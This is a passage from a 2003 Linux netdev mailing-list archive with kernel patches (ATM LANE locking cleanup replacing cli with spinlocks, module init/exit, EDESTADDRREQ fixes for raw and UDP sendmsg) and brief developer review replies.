atmsvc_init(void) +int atmsvc_init(void) { - if (sock_register(&svc_family_ops) < 0) { - printk(KERN_ERR "ATMSVC: can't register"); - return -1; - } - return 0; + return sock_register(&svc_family_ops); } -module_init(atmsvc_init); +void atmsvc_exit(void) +{ + sock_unregister(PF_ATMSVC); +} diff -Nru a/net/netsyms.c b/net/netsyms.c --- a/net/netsyms.c Mon Jun 30 13:22:50 2003 +++ b/net/netsyms.c Mon Jun 30 13:22:50 2003 @@ -163,6 +163,7 @@ EXPORT_SYMBOL(put_cmsg); EXPORT_SYMBOL(sock_kmalloc); EXPORT_SYMBOL(sock_kfree_s); +EXPORT_SYMBOL(sockfd_lookup); #ifdef CONFIG_FILTER EXPORT_SYMBOL(sk_run_filter); diff -Nru a/net/sched/Config.in b/net/sched/Config.in --- a/net/sched/Config.in Mon Jun 30 13:22:50 2003 +++ b/net/sched/Config.in Mon Jun 30 13:22:50 2003 @@ -6,8 +6,8 @@ tristate ' CSZ packet scheduler' CONFIG_NET_SCH_CSZ #tristate ' H-PFQ packet scheduler' CONFIG_NET_SCH_HPFQ #tristate ' H-FSC packet scheduler' CONFIG_NET_SCH_HFCS -if [ "$CONFIG_ATM" = "y" ]; then - bool ' ATM pseudo-scheduler' CONFIG_NET_SCH_ATM +if [ "$CONFIG_ATM" != "n" ]; then + dep_tristate ' ATM pseudo-scheduler' CONFIG_NET_SCH_ATM $CONFIG_ATM fi tristate ' The simplest PRIO pseudoscheduler' CONFIG_NET_SCH_PRIO tristate ' RED queue' CONFIG_NET_SCH_RED [atm]: eliminate cli, make function names sane # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1014 -> 1.1015 # net/atm/lec.c 1.15 -> 1.16 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 davem@nuts.ninka.net 1.1011.1.17 # Merge nuts.ninka.net:/home/davem/src/BK/network-2.4 # into nuts.ninka.net:/home/davem/src/BK/net-2.4 # -------------------------------------------- # 03/06/27 hch@lst.de 1.1011.1.18 # [CRYPTO-2.4]: Missing ULL postfixes and statics. # -------------------------------------------- # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1015 # elminate cli, make function names sane # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:22:04 2003 +++ b/net/atm/lec.c Mon Jun 30 13:22:04 2003 @@ -20,6 +20,7 @@ #include #include #include +#include /* TokenRing if needed */ #ifdef CONFIG_TR @@ -55,6 +56,7 @@ unsigned char *addr); extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); +static spinlock_t lec_arp_spinlock = SPIN_LOCK_UNLOCKED; #define DUMP_PACKETS 0 /* 0 = None, * 1 = 30 first bytes @@ -1049,15 +1051,15 @@ #define HASH(ch) (ch & (LEC_ARP_TABLE_SIZE -1)) static __inline__ void -lec_arp_lock(struct lec_priv *priv) +lec_arp_get(struct lec_priv *priv) { - atomic_inc(&priv->lec_arp_lock_var); + atomic_inc(&priv->lec_arp_users); } static __inline__ void -lec_arp_unlock(struct lec_priv *priv) +lec_arp_put(struct lec_priv *priv) { - atomic_dec(&priv->lec_arp_lock_var); + atomic_dec(&priv->lec_arp_users); } /* @@ -1108,33 +1110,33 @@ * LANE2: Add to the end of the list to satisfy 8.1.13 */ static __inline__ void -lec_arp_put(struct lec_arp_table **lec_arp_tables, - struct lec_arp_table *to_put) +lec_arp_add(struct lec_arp_table **lec_arp_tables, + struct lec_arp_table *to_add) { - unsigned short place; unsigned long flags; + unsigned short place; struct lec_arp_table *tmp; - save_flags(flags); - cli(); + spin_lock_irqsave(&lec_arp_spinlock, flags); - place = HASH(to_put->mac_addr[ETH_ALEN-1]); + place = HASH(to_add->mac_addr[ETH_ALEN-1]); tmp = lec_arp_tables[place]; - to_put->next = NULL; + to_add->next = NULL; if (tmp == NULL) - lec_arp_tables[place] = to_put; + lec_arp_tables[place] = to_add; else { /* add to the end */ while (tmp->next) tmp = tmp->next; - tmp->next = to_put; + tmp->next = to_add; } - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); + DPRINTK("LEC_ARP: Added entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", - 0xff&to_put->mac_addr[0], 0xff&to_put->mac_addr[1], - 0xff&to_put->mac_addr[2], 0xff&to_put->mac_addr[3], - 0xff&to_put->mac_addr[4], 0xff&to_put->mac_addr[5]); + 0xff&to_add->mac_addr[0], 0xff&to_add->mac_addr[1], + 0xff&to_add->mac_addr[2], 0xff&to_add->mac_addr[3], + 0xff&to_add->mac_addr[4], 0xff&to_add->mac_addr[5]); } /* @@ -1144,16 +1146,15 @@ lec_arp_remove(struct lec_arp_table **lec_arp_tables, struct lec_arp_table *to_remove) { + unsigned long flags; unsigned short place; struct lec_arp_table *tmp; - unsigned long flags; int remove_vcc=1; - save_flags(flags); - cli(); + spin_lock_irqsave(&lec_arp_spinlock, flags); if (!to_remove) { - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); return -1; } place = HASH(to_remove->mac_addr[ETH_ALEN-1]); @@ -1165,7 +1166,7 @@ tmp = tmp->next; } if (!tmp) {/* Entry was not found */ - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); return -1; } } @@ -1191,7 +1192,9 @@ lec_arp_clear_vccs(to_remove); } skb_queue_purge(&to_remove->tx_wait); /* FIXME: good place for this? */ - restore_flags(flags); + + spin_unlock_irqrestore(&lec_arp_spinlock, flags); + DPRINTK("LEC_ARP: Removed entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", 0xff&to_remove->mac_addr[0], 0xff&to_remove->mac_addr[1], 0xff&to_remove->mac_addr[2], 0xff&to_remove->mac_addr[3], @@ -1376,12 +1379,8 @@ lec_arp_destroy(struct lec_priv *priv) { struct lec_arp_table *entry, *next; - unsigned long flags; int i; - save_flags(flags); - cli(); - del_timer(&priv->lec_arp_timer); /* @@ -1424,7 +1423,6 @@ priv->mcast_vcc = NULL; memset(priv->lec_arp_tables, 0, sizeof(struct lec_arp_table*)*LEC_ARP_TABLE_SIZE); - restore_flags(flags); } @@ -1441,18 +1439,18 @@ DPRINTK("LEC_ARP: lec_arp_find :%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", mac_addr[0]&0xff, mac_addr[1]&0xff, mac_addr[2]&0xff, mac_addr[3]&0xff, mac_addr[4]&0xff, mac_addr[5]&0xff); - lec_arp_lock(priv); + lec_arp_get(priv); place = HASH(mac_addr[ETH_ALEN-1]); to_return = priv->lec_arp_tables[place]; while(to_return) { if (memcmp(mac_addr, to_return->mac_addr, ETH_ALEN) == 0) { - lec_arp_unlock(priv); + lec_arp_put(priv); return to_return; } to_return = to_return->next; } - lec_arp_unlock(priv); + lec_arp_put(priv); return NULL; } @@ -1579,11 +1577,11 @@ del_timer(&priv->lec_arp_timer); DPRINTK("lec_arp_check_expire %p,%d\n",priv, - priv->lec_arp_lock_var.counter); + atomic_read(&priv->lec_arp_users)); DPRINTK("expire: eo:%p nf:%p\n",priv->lec_arp_empty_ones, priv->lec_no_forward); - if (!priv->lec_arp_lock_var.counter) { - lec_arp_lock(priv); + if (!atomic_read(&priv->lec_arp_users)) { + lec_arp_get(priv); now = jiffies; for(i=0;ilec_arp_timer.expires = jiffies + LEC_ARP_REFRESH_INTERVAL; add_timer(&priv->lec_arp_timer); @@ -1691,7 +1689,7 @@ if (!entry) { return priv->mcast_vcc; } - lec_arp_put(priv->lec_arp_tables, entry); + lec_arp_add(priv->lec_arp_tables, entry); /* We want arp-request(s) to be sent */ entry->packets_flooded =1; entry->status = ESI_ARP_PENDING; @@ -1716,7 +1714,7 @@ struct lec_arp_table *entry, *next; int i; - lec_arp_lock(priv); + lec_arp_get(priv); DPRINTK("lec_addr_delete\n"); for(i=0;ilec_arp_tables[i];entry != NULL; entry=next) { @@ -1727,11 +1725,11 @@ lec_arp_remove(priv->lec_arp_tables, entry); kfree(entry); } - lec_arp_unlock(priv); + lec_arp_put(priv); return 0; } } - lec_arp_unlock(priv); + lec_arp_put(priv); return -1; } @@ -1756,7 +1754,7 @@ return; /* LANE2: ignore targetless LE_ARPs for which * we have no entry in the cache. 7.1.30 */ - lec_arp_lock(priv); + lec_arp_get(priv); if (priv->lec_arp_empty_ones) { entry = priv->lec_arp_empty_ones; if (!memcmp(entry->atm_addr, atm_addr, ATM_ESA_LEN)) { @@ -1790,13 +1788,13 @@ entry->status = ESI_FORWARD_DIRECT; memcpy(entry->mac_addr, mac_addr, ETH_ALEN); entry->last_used = jiffies; - lec_arp_put(priv->lec_arp_tables, entry); + lec_arp_add(priv->lec_arp_tables, entry); } if (remoteflag) entry->flags|=LEC_REMOTE_FLAG; else entry->flags&=~LEC_REMOTE_FLAG; - lec_arp_unlock(priv); + lec_arp_put(priv); DPRINTK("After update\n"); dump_arp_table(priv); return; @@ -1806,11 +1804,11 @@ if (!entry) { entry = make_entry(priv, mac_addr); if (!entry) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } entry->status = ESI_UNKNOWN; - lec_arp_put(priv->lec_arp_tables, entry); + lec_arp_add(priv->lec_arp_tables, entry); /* Temporary, changes before end of function */ } memcpy(entry->atm_addr, atm_addr, ATM_ESA_LEN); @@ -1845,7 +1843,7 @@ } DPRINTK("After update2\n"); dump_arp_table(priv); - lec_arp_unlock(priv); + lec_arp_put(priv); } /* @@ -1859,7 +1857,7 @@ struct lec_arp_table *entry; int i, found_entry=0; - lec_arp_lock(priv); + lec_arp_get(priv); if (ioc_data->receive == 2) { /* Vcc for Multicast Forward. No timer, LANEv2 7.1.20 and 2.3.5.3 */ @@ -1868,7 +1866,7 @@ entry = lec_arp_find(priv, bus_mac); if (!entry) { printk("LEC_ARP: Multicast entry not found!\n"); - lec_arp_unlock(priv); + lec_arp_put(priv); return; } memcpy(entry->atm_addr, ioc_data->atm_addr, ATM_ESA_LEN); @@ -1877,7 +1875,7 @@ #endif entry = make_entry(priv, bus_mac); if (entry == NULL) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } del_timer(&entry->timer); @@ -1886,7 +1884,7 @@ entry->old_recv_push = old_push; entry->next = priv->mcast_fwds; priv->mcast_fwds = entry; - lec_arp_unlock(priv); + lec_arp_put(priv); return; } else if (ioc_data->receive == 1) { /* Vcc which we don't want to make default vcc, attach it @@ -1904,7 +1902,7 @@ ioc_data->atm_addr[18],ioc_data->atm_addr[19]); entry = make_entry(priv, bus_mac); if (entry == NULL) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } memcpy(entry->atm_addr, ioc_data->atm_addr, ATM_ESA_LEN); @@ -1917,7 +1915,7 @@ add_timer(&entry->timer); entry->next = priv->lec_no_forward; priv->lec_no_forward = entry; - lec_arp_unlock(priv); + lec_arp_put(priv); dump_arp_table(priv); return; } @@ -1976,7 +1974,7 @@ } } if (found_entry) { - lec_arp_unlock(priv); + lec_arp_put(priv); DPRINTK("After vcc was added\n"); dump_arp_table(priv); return; @@ -1985,7 +1983,7 @@ this vcc */ entry = make_entry(priv, bus_mac); if (!entry) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } entry->vcc = vcc; @@ -1998,7 +1996,7 @@ entry->timer.expires = jiffies + priv->vcc_timeout_period; entry->timer.function = lec_arp_expire_vcc; add_timer(&entry->timer); - lec_arp_unlock(priv); + lec_arp_put(priv); DPRINTK("After vcc was added\n"); dump_arp_table(priv); } @@ -2044,10 +2042,10 @@ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; struct lec_arp_table *to_add; - lec_arp_lock(priv); + lec_arp_get(priv); to_add = make_entry(priv, mac_addr); if (!to_add) { - lec_arp_unlock(priv); + lec_arp_put(priv); return -ENOMEM; } memcpy(to_add->atm_addr, vcc->remote.sas_addr.prv, ATM_ESA_LEN); @@ -2057,8 +2055,8 @@ to_add->old_push = vcc->push; vcc->push = lec_push; priv->mcast_vcc = vcc; - lec_arp_put(priv->lec_arp_tables, to_add); - lec_arp_unlock(priv); + lec_arp_add(priv->lec_arp_tables, to_add); + lec_arp_put(priv); return 0; } @@ -2070,7 +2068,7 @@ DPRINTK("LEC_ARP: lec_vcc_close vpi:%d vci:%d\n",vcc->vpi,vcc->vci); dump_arp_table(priv); - lec_arp_lock(priv); + lec_arp_get(priv); for(i=0;ilec_arp_tables[i];entry; entry=next) { next = entry->next; @@ -2132,7 +2130,7 @@ entry = next; } - lec_arp_unlock(priv); + lec_arp_put(priv); dump_arp_table(priv); } @@ -2140,9 +2138,9 @@ lec_arp_check_empties(struct lec_priv *priv, struct atm_vcc *vcc, struct sk_buff *skb) { + unsigned long flags; struct lec_arp_table *entry, *prev; struct lecdatahdr_8023 *hdr = (struct lecdatahdr_8023 *)skb->data; - unsigned long flags; unsigned char *src; #ifdef CONFIG_TR struct lecdatahdr_8025 *tr_hdr = (struct lecdatahdr_8025 *)skb->data; @@ -2152,26 +2150,26 @@ #endif src = hdr->h_source; - lec_arp_lock(priv); + lec_arp_get(priv); entry = priv->lec_arp_empty_ones; if (vcc == entry->vcc) { - save_flags(flags); - cli(); + spin_lock_irqsave(&lec_arp_spinlock, flags); del_timer(&entry->timer); memcpy(entry->mac_addr, src, ETH_ALEN); entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; priv->lec_arp_empty_ones = entry->next; - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); /* We might have got an entry */ if ((prev=lec_arp_find(priv,src))) { lec_arp_remove(priv->lec_arp_tables, prev); kfree(prev); } - lec_arp_put(priv->lec_arp_tables, entry); - lec_arp_unlock(priv); + lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_put(priv); return; } + spin_lock_irqsave(&lec_arp_spinlock, flags); prev = entry; entry = entry->next; while (entry && entry->vcc != vcc) { @@ -2180,22 +2178,21 @@ } if (!entry) { DPRINTK("LEC_ARP: Arp_check_empties: entry not found!\n"); - lec_arp_unlock(priv); + lec_arp_put(priv); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); return; } - save_flags(flags); - cli(); del_timer(&entry->timer); memcpy(entry->mac_addr, src, ETH_ALEN); entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; prev->next = entry->next; - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); if ((prev = lec_arp_find(priv, src))) { lec_arp_remove(priv->lec_arp_tables,prev); kfree(prev); } - lec_arp_put(priv->lec_arp_tables,entry); - lec_arp_unlock(priv); + lec_arp_add(priv->lec_arp_tables,entry); + lec_arp_put(priv); } MODULE_LICENSE("GPL"); From davem@redhat.com Thu Jul 10 13:46:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 13:47:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AKk62x022106 for ; Thu, 10 Jul 2003 13:46:47 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id NAA27192; Thu, 10 Jul 2003 13:37:37 -0700 Date: Thu, 10 Jul 2003 13:37:37 -0700 (PDT) Message-Id: <20030710.133737.41660806.davem@redhat.com> To: scott.feldman@intel.com Cc: willy@debian.org, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3911 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Feldman, Scott" Date: Thu, 10 Jul 2003 01:18:50 -0700 With HAVE_NETDEV_OPS, you're right, we're maintaining the wrapper code outside the kernel. But, it does leave the possibility of having a shared backwards compatibility code for multiple (all?) drivers for those stuck with supporting kernels without netdev_ops. And precisely I am showing you how all this backwards compat stuff is going to hurt you. You can never truly take advantage of things that eliminate duplicated code in all the drivers, and this netdev_ops case is a great example. From krkumar@us.ibm.com Thu Jul 10 15:17:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:17:58 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMGr2x023078 for ; Thu, 10 Jul 2003 15:17:23 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6AMFoXq203788; Thu, 10 Jul 2003 18:15:50 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6AMFlDQ083410; Thu, 10 Jul 2003 18:15:48 -0400 Message-ID: <3F0DE5B9.20702@us.ibm.com> Date: Thu, 10 Jul 2003 15:16:25 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: yoshfuji@linux-ipv6.org CC: davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH] Prefix List against 2.5.70 (re-done) References: <20030627.144752.78715628.davem@redhat.com> <20030628.130602.63704890.yoshfuji@linux-ipv6.org> <3F008771.5030206@us.ibm.com> <20030702.091825.72842784.yoshfuji@linux-ipv6.org> In-Reply-To: <20030702.091825.72842784.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3912 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > You do not explain why we (or kernel) NEED(s) this. > It is not so important how SMALL it is > though it may cause problems how LARGE it is. I had explained the reasons for having prefix list i/f in my previous mail. To recap : - User don't need to know what the definition of a prefix is, all he has to do is ask the kernel and get the list. Otherwise different user apps will have to know the definition of a prefix and parse the entry themselves. The parsing is non-trivial (eg the address should not LL or MC, there should be no nexthop and it should be added via an RA, etc). - The kernel code to get the prefix list is small, the top level inet6_dump_fib uses either the dump_node or the dump_prefix, the latter being the new user interface. Having a user interface makes it easier to get the prefix list without significant bloat to the kernel. > This is design issue; how we should provide L3 per-interface > information to userspace; eg. in_device and/or inet6_dev things > including per-interface statistics. > > Since I think it is not appropriate to provide per-interface > statistics via RTM_xxxROUTE, so I don't agree to provide > the RA infomation (i.e. Manage/Otherconf Flags) via > RTM_xxxROUTE. > > Options: > - use RTM_xxxLINK for L3 operation > - introduce RTM_xxxIFACE for L3 per-interface operations Yes, there are a couple of different ways to do this. One is as you have suggested, but there is a problem with it. The existing RTM_GETLINK interface returns very generic elements of the dev (mtu, hardware address, dev statistics), while the change you suggested is specific to ipv6. I am not sure if this is a good design to implement. Either we could use the current (submitted) way or use a different RTM_GETADDR interface in inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to IPv6. Are you agreeable to this ? > Well, on moving forward; you can split your patch up to 3 things: > 1. fix routing flags > 2. provide Managed/Otherconf flags API > (3. provide the prefix list API (if it IS required)) > > I'm not against the first item. > We need to discuss on the design related to the 2nd item. > I don't think that we really need 3rd item. - I am ok with 1 :-) - I have suggested changes for 2, please let me know what you think, whether we can go with the old way or make the change suggested above. - I believe we need #3 for the reasons given above. Thanks, - KK From jgarzik@pobox.com Thu Jul 10 15:40:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:40:35 -0700 (PDT) Received: from www.linux.org.uk (IDENT:5kp1wT94CwjrkUhuLQy1tBbkPHBHdG9m@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMeQ2x023497 for ; Thu, 10 Jul 2003 15:40:28 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak5P-0004nO-3P; Thu, 10 Jul 2003 23:40:25 +0100 Message-ID: <3F0DEB4B.7040101@pobox.com> Date: Thu, 10 Jul 2003 18:40:11 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Jay Schulist , netdev@oss.sgi.com Subject: Re: [PATCH 2.5.74] Change appletalk/cops to dynamic allocation of net_device References: <20030709132910.589cf65d.shemminger@osdl.org> In-Reply-To: <20030709132910.589cf65d.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3913 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev viro did this one... From jgarzik@pobox.com Thu Jul 10 15:40:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:40:55 -0700 (PDT) Received: from www.linux.org.uk (IDENT:qbDKeNZrmQm5yEbjha1NB9G1vd071C7A@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMen2x023550 for ; Thu, 10 Jul 2003 15:40:49 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak5o-0004nh-83; Thu, 10 Jul 2003 23:40:48 +0100 Message-ID: <3F0DEB65.20806@pobox.com> Date: Thu, 10 Jul 2003 18:40:37 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Jay Schulist , netdev@oss.sgi.com Subject: Re: [PATCH 2.5.74] convert appletalk/ltpc over to dynamic allocation References: <20030709132438.432fcd2b.shemminger@osdl.org> In-Reply-To: <20030709132438.432fcd2b.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3914 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev viro did this one too... ftp://ftp.linux.org.uk/pub/people/viro/ From jgarzik@pobox.com Thu Jul 10 15:42:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:42:56 -0700 (PDT) Received: from www.linux.org.uk (IDENT:3xpceegHnb6QZV89SITKn5u2s3mlGXCM@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMgq2x024117 for ; Thu, 10 Jul 2003 15:42:52 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak7n-00051n-25; Thu, 10 Jul 2003 23:42:51 +0100 Message-ID: <3F0DEBE0.9030309@pobox.com> Date: Thu, 10 Jul 2003 18:42:40 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Jay Schulist , netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: Re: [PATCH 2.5.74] convert appletalk/ipddp to dynamic allocation References: <20030709131334.79df4dca.shemminger@osdl.org> In-Reply-To: <20030709131334.79df4dca.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3915 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Stephen Hemminger wrote: > + > + if((err = register_netdev(dev_ipddp))) > + kfree(dev_ipddp); style otherwise, ok. From jgarzik@pobox.com Thu Jul 10 15:44:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:44:26 -0700 (PDT) Received: from www.linux.org.uk (IDENT:C88UjqQzPLNwoiRhvHcnFKqlufCnUkHo@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMiL2x024424 for ; Thu, 10 Jul 2003 15:44:22 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ak9F-00057s-10; Thu, 10 Jul 2003 23:44:21 +0100 Message-ID: <3F0DEC3A.9070901@pobox.com> Date: Thu, 10 Jul 2003 18:44:10 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: netdev@oss.sgi.com Subject: Re: [PATCH] convert plip to alloc_netdev References: <20030708151742.715ca49c.shemminger@osdl.org> In-Reply-To: <20030708151742.715ca49c.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3916 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev applied From jgarzik@pobox.com Thu Jul 10 15:45:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:46:00 -0700 (PDT) Received: from www.linux.org.uk (IDENT:S1fsYb6R6tHVH/C4Lw+9cKjv5pLQypHk@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMju2x024734 for ; Thu, 10 Jul 2003 15:45:56 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19akAk-00058b-JG; Thu, 10 Jul 2003 23:45:54 +0100 Message-ID: <3F0DEC97.2040301@pobox.com> Date: Thu, 10 Jul 2003 18:45:43 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: netdev@oss.sgi.com Subject: Re: [PATCH] (dgrs) References: <20030708151606.483604ad.shemminger@osdl.org> In-Reply-To: <20030708151606.483604ad.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3917 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev applied From tgr@reeler.org Thu Jul 10 16:32:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 16:32:49 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ANWb2x026242 for ; Thu, 10 Jul 2003 16:32:38 -0700 Received: by reeler.org id 19aktj-0008Vt-00 ; Fri, 11 Jul 2003 01:32:23 +0200 Date: Fri, 11 Jul 2003 01:32:23 +0200 From: Thomas Graf To: davem@redhat.com Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified Message-ID: <20030710233223.GA30577@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3918 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello Another 1003.1 fix: [EDESTADDRREQ] The socket is not connection-mode and does not have its peer address set, and no destination address was specified. fixes sendmsg in ipv{4,6}/{raw,udp} -- thomas Index: net/ipv4/raw.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv4/raw.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 raw.c --- net/ipv4/raw.c 10 Jul 2003 22:58:45 -0000 1.1.1.2 +++ net/ipv4/raw.c 10 Jul 2003 23:18:04 -0000 @@ -383,7 +383,7 @@ * IP_HDRINCL is much more convenient. */ } else { - err = -EINVAL; + err = -EDESTADDRREQ; if (sk->sk_state != TCP_ESTABLISHED) goto out; daddr = inet->daddr; Index: net/ipv4/udp.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv4/udp.c,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 udp.c --- net/ipv4/udp.c 9 Jul 2003 18:42:29 -0000 1.1.1.1 +++ net/ipv4/udp.c 10 Jul 2003 23:18:04 -0000 @@ -540,7 +540,7 @@ return -EINVAL; } else { if 